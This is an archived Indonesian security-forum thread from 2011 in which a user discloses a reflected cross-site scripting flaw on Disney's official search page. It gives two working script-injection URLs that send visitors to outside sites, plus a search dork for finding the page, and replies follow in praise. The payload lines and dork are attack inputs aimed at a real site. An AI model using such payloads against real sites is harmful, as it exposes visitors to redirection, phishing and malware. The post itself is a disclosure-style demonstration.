Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/

XSS pada situs resmi Walt Disney

http://xcode.or.id/forum/viewtopic.php?f=99&t=42408

Page 1 of 1

XSS pada situs resmi Walt Disney

Posted: Mon Nov 07, 2011 6:43 am
by poni
Image

Situs resmi Disney rentan terhadap serangan Cross Site Scripting, penyerang dapat mengirimkan redirect link melalui disney.go.com. jika korban klik link tersebut, maka akan diarahkan ke website yang mungkin mengandung malware. lihat demonya dibawah ini.

Code: Select all

http://disney.go.com/search/?q="><script>window.location = "http://www.xcode.or.id/"</script>
http://disney.go.com/search/?q="><script>window.location = "http://ferdianelli.wordpress.com/2011/01/08/update-08-jan-2011-xcode-sqlilfixss-vulnurable-webshell-scanner/"</script>
Bug XSS pada situs Disney terdeteksi dengan Xcode Xploit Scanner
dork :

Code: Select all

inurl:/search/?q= site:disney.go.com

Re: XSS pada situs resmi Walt Disney

Posted: Tue Nov 08, 2011 12:08 am
by wiLMaR_kiDz
Hmmm...mulai deh.. 8-)

Re: XSS pada situs resmi Walt Disney

Posted: Fri Nov 11, 2011 12:09 am
by whitehat
asik om tutorialnya......
:lol: :lol:
All times are UTC+07:00
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/